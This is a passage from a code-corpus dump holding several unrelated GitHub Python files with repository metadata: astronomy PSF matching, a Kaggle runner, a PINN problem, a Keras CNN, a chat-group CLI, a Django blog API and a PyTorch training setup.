'/home/sourabh/ULIRG_package/data/IRASF10594+3818/gal1_HA.fits'\nfileout = '/home/sourabh/ULIRG_package/data/IRASF10594+3818/gal1_HA_psfmatch.fits'\nker = 'ker.fits'\n#ker_shift = np.pad(kernel, ((0, 1), (0, 1)), mode='constant')\ndata1 = scipy_convolve(data_psf, kernel, mode='same')\nfits.writeto('test2.fits', data=data1, overwrite=True)\ndata3 = data1 - data_ref\nfits.writeto('test3.fits', data=data3, overwrite=True)\n\n\ndef psf_match(filename, fileout, ker):\n hdulist = fits.open(filename)\n data = hdulist[0].data\n\n hdu_ker = fits.open(ker)\n ker_data = hdu_ker[0].data\n ker_shift = np.pad(ker_data, ((0, 1), (0, 1)), mode='constant')\n\n data_out = scipy_convolve(data, ker_shift, mode='same', method='fft') # convolve\n\n hdulist[0].data = data_out\n fits.writeto('test.fits', data=data_out - data, overwrite=True)\n hdulist.writeto(fileout, overwrite=True, output_verify=\"ignore\")\n\n\npsf_match(filename, fileout, ker)\n\n\nplt.colorbar()\nplt.show()\n\n\n# In[36]:\n\n\nfrom matplotlib import pylab\n\nparams = {'legend.fontsize': 10,\n 'figure.figsize': (15, 7),\n 'axes.labelsize': 'x-large',\n 'axes.titlesize': 'x-large',\n 'xtick.labelsize': 'xx-large',\n 'ytick.labelsize': 'xx-large'}\nimport pylab as plot\nplot.rcParams.update(params)\npylab.rcParams.update(params)\n\n\ndef masks_circular(cent_x, cent_y, width, aper_lim, nx, ny):\n \"\"\"Function for creating circular aperture given center of circle.\n\n Args:\n cent_x:(float) x center pixel\n cent_y:(float) y center pixel\n width: (float) width of each aperture\n aper_lim:(float) maximum radius of aperture\n nx:(int) x width of total ULIRG image\n ny:(int) y width of total ULIRG image\n\n Returns:\n dict: masks- circular masks\\n\n masks_annulus - masks for annuli\\n\n\n \"\"\"\n rad1 = np.arange(1., aper_lim, width)\n y, x = np.mgrid[0:ny, 0:nx]\n masks_annulus = [np.where(((x - cent_x)**2 + (y - cent_y)**2 >= rad1[k]**2)\n & ((x - cent_x)**2 + (y - cent_y)**2 <= rad1[k + 1]**2)) for k in range(len(rad1) - 1)]\n\n masks = [np.where((x - cent_x)**2 + (y - cent_y)**2 < rad1[k]**2) for k in range(len(rad1))]\n rad_annulus = ([(a + b) / 2 for a, b in zip(rad1, rad1[1:])])\n\n return rad1, rad_annulus, masks, masks_annulus\n\n\ncent_x = 65\ncent_y = 65\nwidth = 3\naper_lim = 120\nnx = 130\nny = 130\nrad1, rad_annulus, masks, masks_annulus = masks_circular(cent_x, cent_y, width, aper_lim, nx, ny)\n\n\naper_ref = [(np.mean(data_ref[masks_annulus[k]])) for k in range(len(rad1) - 1)]\naper_psf = [(np.mean(data_psf[masks_annulus[k]])) for k in range(len(rad1) - 1)]\n#plt.plot(rad_annulus, aper_ref/aper_ref[0], label ='f165')\n#plt.plot(rad_annulus, aper_psf/aper_psf[0], label = 'f775')\naper_ref_sum = [(np.sum(data_ref[masks[k]])) for k in range(len(rad1))]\naper_psf_sum = [(np.sum(data_psf[masks[k]])) for k in range(len(rad1))]\n\n\nplt.plot(rad1, aper_ref_sum, label='f165')\nplt.plot(rad1, aper_psf_sum, label='f775')\n\n#plt.plot(rad_annulus, aper_ref/aper_ref[0], label ='f165')\n#plt.plot(rad_annulus, aper_psf/aper_psf[0], label = 'f775')\n\nplt.legend()\nplt.show()\n", "repo_name": "sourabhsc/NULIRG", "sub_path": "analysis/phot.py", "file_name": "phot.py", "file_ext": "py", "file_size_in_byte": 3864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "photutils.CosineBellWindow", "line_number": 10, "usage_type": "call"}, {"api_name": "photutils.TopHatWindow", "line_number": 12, "usage_type": "call"}, {"api_name": "astropy.io.fits.getdata", "line_number": 15, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 15, "usage_type": "name"}, {"api_name": "astropy.io.fits.getdata", "line_number": 16, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 16, "usage_type": "name"}, {"api_name": "photutils.create_matching_kernel", "line_number": 17, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 18, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 24, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 25, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 25, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 31, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 31, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 34, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.signal.convolve", "line_number": 38, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 41, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "pylab.rcParams.update", "line_number": 64, "usage_type": "call"}, {"api_name": "pylab.rcParams", "line_number": 64, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "9888557967", "text": "import os\nimport sys\nimport time\nimport json\nimport argparse\n\nimport kaggle\n\n\ndef get_fetchparser():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument(\n 'kernel',\n help=\"Path to the notebook for which to fetch output from kaggle\"\n )\n return argparser\n\n\ndef get_runparser():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument(\n '--wait',\n action='store_true',\n help=\"Wait for notebook to finish executing\"\n )\n argparser.add_argument(\n '--fetch',\n action='store_true',\n help=\"Fetch notebook output\"\n )\n argparser.add_argument(\n 'kernel',\n help=\"Path to the notebook to execute on kaggle\"\n )\n return argparser\n\n\ndef get_metadata(kernel_dir):\n with open(os.path.join(kernel_dir, 'kernel-metadata.json')) as f:\n return json.load(f)\n\n\ndef wait_for(kernel_name):\n # wait for the kernel to finish running\n while True:\n time.sleep(1)\n print('.', end='', flush=True)\n status = kaggle.api.kernels_status(kernel_name)\n if status['status'] == 'complete':\n print(\"Kernel finished running\")\n break\n\n\ndef run():\n argv = sys.argv[1:]\n args = get_runparser().parse_args(argv)\n\n kernel_dir = os.path.dirname(args.kernel)\n\n print('submiting...')\n\n kaggle.api.kernels_push_cli(kernel_dir)\n\n metadata = get_metadata(kernel_dir)\n\n if args.wait or args.fetch:\n wait_for(metadata['id'])\n\n if args.fetch:\n kaggle.api.kernels_output(metadata['id'],\n os.path.join(kernel_dir, 'outputs'))\n\n\ndef fetch():\n argv = sys.argv[1:]\n args = get_fetchparser().parse_args(argv)\n\n kernel_dir = os.path.dirname(args.kernel)\n metadata = get_metadata(kernel_dir)\n\n wait_for(metadata['id'])\n kaggle.api.kernels_output(metadata['id'],\n os.path.join(kernel_dir, 'outputs'))\n", "repo_name": "chestrays/chestrays", "sub_path": "chestrays/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "kaggle.api.kernels_status", "line_number": 50, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_push_cli", "line_number": 64, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 64, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_output", "line_number": 72, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_output", "line_number": 84, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}]} +{"seq_id": "27432342535", "text": "import torch\nimport numpy as np\nfrom torch.autograd import grad\n\nregion = [(-1,1),(0,1)]\n\ndef d(x,t):\n '''\n 到边界的距离函数\n '''\n return (x.pow(2)-1)*t\n\ndef g(x,t):\n '''\n 边界条件\n '''\n return -torch.sin(np.pi*x)\n\n\nu_real= 0\n\nBurgers_data = {'d':d,'g':g,'u_real':u_real,'region':region}", "repo_name": "xinyuxiao113/PINN-pytorch", "sub_path": "code/burgers/testProblem.py", "file_name": "testProblem.py", "file_ext": "py", "file_size_in_byte": 323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "42658377431", "text": "from DLplatform.learning.factories.kerasLearnerFactory import KerasNetwork\nimport numpy as np\n\nclass MNISTCNNNetwork(KerasNetwork):\n def __init__(self):\n pass\n \n def __call__(self):\n import tensorflow as tf\n from keras.models import Model\n from keras.layers import Input, Dense, Dropout, Conv2D, MaxPooling2D, Flatten\n from keras.initializers import glorot_uniform\n \n numClasses = 10\n imgRows = 28\n imgCols = 28\n inputShape = (imgRows, imgCols, 1)\n np.random.seed(42)\n tf.set_random_seed(42)\n static_initializer = glorot_uniform(seed=42)\n\n inp = Input(shape=inputShape)\n conv1 = Conv2D(32, kernel_size=(3, 3), activation='relu', \n kernel_initializer=static_initializer)(inp)\n conv2 = Conv2D(64, (3, 3), activation='relu', kernel_initializer=static_initializer)(conv1)\n pool = MaxPooling2D(pool_size=(2, 2))(conv2)\n dp1 = Dropout(0.25, seed=42)(pool)\n fl = Flatten()(dp1)\n ds = Dense(128, activation='relu', kernel_initializer=static_initializer)(fl)\n dp2 = Dropout(0.5, seed=42)(ds)\n outp = Dense(numClasses, activation='softmax', kernel_initializer=static_initializer)(dp2)\n network = Model(inputs=inp, outputs=outp)\n return network\n \n def __str__(self):\n return \"MNIST simple CNN\"\n", "repo_name": "fraunhofer-iais/dlapplication", "sub_path": "dlutils/models/keras/MNISTNetwork.py", "file_name": "MNISTNetwork.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "DLplatform.learning.factories.kerasLearnerFactory.KerasNetwork", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.set_random_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.initializers.glorot_uniform", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "43110832693", "text": "# -*- coding: utf-8 -*-\nimport config\nimport requests\nimport logging\nimport json\nimport time\nimport sys\nimport pymysql\nimport redis\nimport pprint\nfrom group import Group\nfrom user import User\nfrom rpc import send_group_notification\nfrom mysql import Mysql\nimport config\n\npublish_message = Group.publish_message\n\n\nrds = redis.StrictRedis(host=config.REDIS_HOST, password=config.REDIS_PASSWORD,\n port=config.REDIS_PORT, db=config.REDIS_DB, decode_responses=True)\n\n\ndb = Mysql(config.MYSQL_HOST, config.MYSQL_USER, config.MYSQL_PASSWD,\n config.MYSQL_DATABASE, config.MYSQL_PORT,\n config.MYSQL_CHARSET, config.MYSQL_AUTOCOMMIT)\n\nAPPID = config.APPID\n\ndef create_group(master, name, is_super, members):\n appid = APPID\n gid = Group.create_group(db, appid, master, name, \n is_super, members)\n \n s = 1 if is_super else 0\n content = {\n \"group_id\":gid,\n \"app_id\":appid,\n \"super\":s,\n \"name\":Group.GROUP_EVENT_CREATE\n } \n publish_message(rds, content)\n \n for mem in members:\n content = {\n \"group_id\":gid,\n \"member_id\":mem,\n \"name\":Group.GROUP_EVENT_MEMBER_ADD\n } \n publish_message(rds, content)\n \n v = {\n \"group_id\":gid, \n \"master\":master, \n \"name\":name, \n \"members\":members,\n \"timestamp\":int(time.time())\n }\n op = {\"create\":v}\n send_group_notification(appid, gid, op, members)\n \n return gid\n\n\n\ndef delete_group(gid):\n appid = APPID\n Group.disband_group(db, gid)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time())\n }\n op = {\"disband\":v}\n send_group_notification(appid, gid, op, None)\n\n content = {\"group_id\":gid, \"name\":Group.GROUP_EVENT_DISBAND} \n publish_message(rds, content)\n\n\n\ndef upgrade_group(gid):\n \"\"\"从普通群升级为超级群\"\"\"\n appid = APPID\n group = Group.get_group(db, gid)\n\n members = Group.get_group_members(db, gid)\n\n if not group:\n raise ResponseMeta(400, \"group non exists\")\n\n Group.update_group_super(db, gid, 1)\n\n\n content = {\n \"group_id\":gid,\n \"app_id\":appid,\n \"super\":1,\n \"name\":Group.GROUP_EVENT_UPGRADE\n } \n publish_message(rds, content)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time()),\n \"super\":1\n }\n op = {\"upgrade\":v}\n send_group_notification(appid, gid, op, None)\n\n\ndef update_group(gid):\n \"\"\"更新群组名称\"\"\"\n appid = request.appid\n obj = json.loads(request.data)\n name = obj[\"name\"]\n Group.update_group_name(db, gid, name)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time()),\n \"name\":name\n }\n op = {\"update_name\":v}\n send_group_notification(appid, gid, op, None)\n \ndef add_group_member(gid, members):\n appid = APPID\n if len(members) == 0:\n return\n\n db.begin()\n for member_id in members:\n try:\n Group.add_group_member(db, gid, member_id)\n except pymysql.err.IntegrityError as e:\n if e.args[0] != 1062: \n raise \n\n db.commit()\n\n for member_id in members:\n v = {\n \"group_id\":gid,\n \"member_id\":member_id,\n \"timestamp\":int(time.time())\n }\n op = {\"add_member\":v}\n send_group_notification(appid, gid, op, [member_id])\n\n content = {\n \"group_id\":gid,\n \"member_id\":member_id,\n \"name\":Group.GROUP_EVENT_MEMBER_ADD\n } \n publish_message(rds, content)\n\n\n\ndef remove_group_member(gid, memberid):\n appid = APPID\n Group.delete_group_member(db, gid, memberid)\n \n v = {\n \"group_id\":gid,\n \"member_id\":memberid,\n \"timestamp\":int(time.time())\n }\n op = {\"quit_group\":v}\n send_group_notification(appid, gid, op, [memberid])\n\n content = {\n \"group_id\":gid,\n \"member_id\":memberid,\n \"name\":Group.GROUP_EVENT_MEMBER_REMOVE\n } \n publish_message(rds, content)\n \n\n\ndef get_groups(uid):\n \"\"\"获取个人的群组列表\"\"\"\n appid = APPID\n groups = Group.get_groups(db, appid, uid)\n return groups\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.exit(1)\n cmd = sys.argv[1]\n if cmd == \"create\":\n master = int(sys.argv[2])\n name = sys.argv[3]\n is_super = int(sys.argv[4])\n members = []\n for m in sys.argv[5:]:\n members.append(int(m))\n\n gid = create_group(master, name, is_super, members)\n print(\"new group id:\", gid)\n \n elif cmd == \"delete\":\n gid = int(sys.argv[2])\n delete_group(gid)\n \n elif cmd == \"upgrade\":\n gid = int(sys.argv[2])\n upgrade_group(gid)\n \n elif cmd == \"add_member\":\n gid = int(sys.argv[2])\n members = [] \n for m in sys.argv[3:]:\n members.append(int(m))\n\n add_group_member(gid, members)\n\n elif cmd == \"remove_member\":\n gid = int(sys.argv[2])\n for m in sys.argv[3:]:\n remove_group_member(gid, int(m))\n \n elif cmd == \"get\":\n uid = int(sys.argv[2])\n groups = get_groups(uid) \n pp = pprint.PrettyPrinter()\n pp.pprint(groups)\n\n elif cmd == \"test\":\n master = 1\n name = \"test\"\n is_super = 0\n members = [1, 2, 3, 4]\n gid = create_group(master, name, is_super, members)\n print(\"new group id:\", gid)\n \n\n add_group_member(gid, [5, 6])\n remove_group_member(gid, 6)\n \n upgrade_group(gid)\n\n groups = get_groups(master)\n \n pp = pprint.PrettyPrinter()\n pp.pprint(groups)\n\n delete_group(gid)\n", "repo_name": "GoBelieveIO/gobelieve_vagrant", "sub_path": "cli/gobelieve_group.py", "file_name": "gobelieve_group.py", "file_ext": "py", "file_size_in_byte": 5825, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "group.Group.publish_message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 17, "usage_type": "name"}, {"api_name": "redis.StrictRedis", "line_number": 20, "usage_type": "call"}, {"api_name": "config.REDIS_HOST", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.REDIS_PASSWORD", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.REDIS_PORT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.REDIS_DB", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mysql.Mysql", "line_number": 24, "usage_type": "call"}, {"api_name": "config.MYSQL_HOST", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_USER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_PASSWD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_DATABASE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.MYSQL_PORT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.MYSQL_CHARSET", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.MYSQL_AUTOCOMMIT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.APPID", "line_number": 28, "usage_type": "attribute"}, {"api_name": "group.Group.create_group", "line_number": 32, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 32, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_CREATE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 40, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_ADD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 48, "usage_type": "name"}, {"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 60, "usage_type": "call"}, {"api_name": "group.Group.disband_group", "line_number": 68, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 68, "usage_type": "name"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 75, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_DISBAND", "line_number": 77, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 77, "usage_type": "name"}, {"api_name": "group.Group.get_group", "line_number": 85, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 85, "usage_type": "name"}, {"api_name": "group.Group.get_group_members", "line_number": 87, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 87, "usage_type": "name"}, {"api_name": "group.Group.update_group_super", "line_number": 92, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 92, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_UPGRADE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 99, "usage_type": "name"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 109, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "group.Group.update_group_name", "line_number": 117, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 117, "usage_type": "name"}, {"api_name": "time.time", "line_number": 121, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 125, "usage_type": "call"}, {"api_name": "group.Group.add_group_member", "line_number": 135, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 135, "usage_type": "name"}, {"api_name": "pymysql.err", "line_number": 136, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 146, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 149, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_ADD", "line_number": 154, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 154, "usage_type": "name"}, {"api_name": "group.Group.delete_group_member", "line_number": 162, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 162, "usage_type": "name"}, {"api_name": "time.time", "line_number": 167, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 170, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_REMOVE", "line_number": 175, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 175, "usage_type": "name"}, {"api_name": "group.Group.get_groups", "line_number": 184, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 184, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 188, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 190, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 193, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 194, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 196, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 219, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 220, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pprint.PrettyPrinter", "line_number": 226, "usage_type": "call"}, {"api_name": "pprint.PrettyPrinter", "line_number": 245, "usage_type": "call"}]} +{"seq_id": "71390490843", "text": "from datetime import date\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.permissions import IsAdminUser\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework.response import Response\nfrom .serializers import BlogPostSerializer\n\nfrom homepage.models import Post\n\n\n# class BlogListAPI(generics.ListCreateAPIView):\n# lookup_field = 'pk'\n# queryset = Post.objects.all()\n# serializer_class = BlogPostSerializer\n# # permission_classes = (IsAdminUser,)\n#\n\n@api_view(['GET'])\ndef apioverview(request):\n api_url = {\n 'List View': '/post-list/',\n 'detail View': '/post-list/str:pk/',\n 'Create': '/post-create/',\n 'update': '/post-update//',\n 'Delete': '/post-delete//',\n }\n # queryset = Post.objects.all()\n # serializer = BlogPostSerializer\n return Response(api_url)\n\n\n@api_view(['GET'])\n@permission_classes([])\ndef post_list(request):\n posts = Post.objects.all().filter(post_available_date__date__lte=date.today()).order_by(\n 'post_available_date').reverse()\n serializer = BlogPostSerializer(posts, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef post_details(request, pk):\n posts = Post.objects.get(post_id=pk)\n serializer = BlogPostSerializer(posts, many=False)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\n# @authentication_classes([SessionAuthentication, BasicAuthentication])\n@permission_classes([IsAuthenticated])\ndef post_create(request):\n serializer = BlogPostSerializer(data=request.data)\n try:\n if serializer.is_valid():\n serializer.save()\n except Exception as e:\n print(e)\n print(serializer.errors)\n return Response(serializer.data)\n", "repo_name": "mamjow/Helvoirt", "sub_path": "homepage/Api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects.all", "line_number": 36, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "homepage.models.Post", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "name"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 34, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "homepage.models.Post", "line_number": 44, "usage_type": "name"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 42, "usage_type": "call"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 51, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "5803491742", "text": "import torch\r\nimport argparse\r\nfrom torch.utils.data import Dataset\r\nfrom copy import deepcopy\r\nfrom utils import mydataset, Experiment\r\n\r\nif __name__ == '__main__':\r\n\r\n parser = argparse.ArgumentParser()\r\n args = parser.parse_args(\"\")\r\n dim = parser.parse_args(\"\")\r\n pin_memory = True\r\n\r\n args.main_dir = r'/'\r\n args.data_dir = r'/'\r\n args.train_dir = r'dataset_train'\r\n args.test_dir = r'dataset_test'\r\n args.savefilename = 'RAN_ENV_AB'\r\n args.numberOfWorkers = 16\r\n args.train_batch_size = 24\r\n args.test_batch_size = 24\r\n args.epoch = 250\r\n\r\n device = torch.device(\"cuda:0\")\r\n\r\n args.lr = 5e-6\r\n args.l2 = args.lr * 1e-2\r\n args.lambda1 = 0.0\r\n args.lambda2 = 5e-8\r\n\r\n print('Loading Dataset')\r\n trainset = mydataset.create_dataset(args.data_dir, args.train_dir)\r\n trainset, valset = torch.utils.data.random_split(trainset, [len(trainset) - int(400), int(400)])\r\n testset 